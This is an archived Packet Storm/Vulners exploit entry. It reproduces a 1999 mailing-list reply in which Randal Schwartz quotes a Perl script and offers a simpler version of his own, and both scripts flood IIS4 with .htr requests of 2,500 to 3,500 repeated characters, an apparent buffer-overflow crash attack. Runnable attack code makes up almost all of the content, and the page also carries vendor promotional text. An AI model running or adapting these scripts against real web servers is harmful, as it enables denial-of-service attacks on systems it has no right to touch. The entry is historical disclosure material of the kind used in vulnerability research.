Lucene search
K

iis4.htr-2.pl

🗓️ 17 Aug 1999 00:00:00Reported by Randal SchwartzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Script for HTTP requests targeting IIS4, demonstrating potential security exploit methods.

Code
`Re: Retina vs. IIS4, Round 2, KO  
  
Randal L. Schwartz ([email protected])  
Tue, 15 Jun 1999 16:59:08 -0700   
  
>>>>> "Ryan" == Ryan R Permeh <[email protected]> writes:  
  
Ryan> #!/usr/bin/perl  
Ryan> #props to the absu crew  
Ryan> use Net::Telnet;  
Ryan> for ($i=2500;$i<3500;$i++)  
Ryan> {  
Ryan> $obj=Net::Telnet->new( Host => "$ARGV[0]",Port => 80);  
Ryan> my $cmd = "GET /". 'A' x $i . ".htr HTTP/1.0\n";  
Ryan> print "$cmd\n";$obj->print("$cmd");  
Ryan> $obj->close;  
Ryan> }  
  
It's silly to use Net::Telnet for HTTP:  
  
use LWP::Simple;  
for ($i = 2500; $i <= 3500; $i++) {  
warn "$i\n";  
get "http://$ARGV[0]/".('a' x $i).".htr";  
}  
  
--  
Name: Randal L. Schwartz / Stonehenge Consulting Services (503)777-0095  
Keywords: Perl training, UNIX[tm] consulting, video production, skiing, flying  
Email: <[email protected]> Snail: (Call) PGP-Key: (finger [email protected])  
Web: <A HREF="http://www.stonehenge.com/merlyn/">My Home Page!</A>  
Quote: "I'm telling you, if I could have five lines in my .sig, I would!" -- me  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
24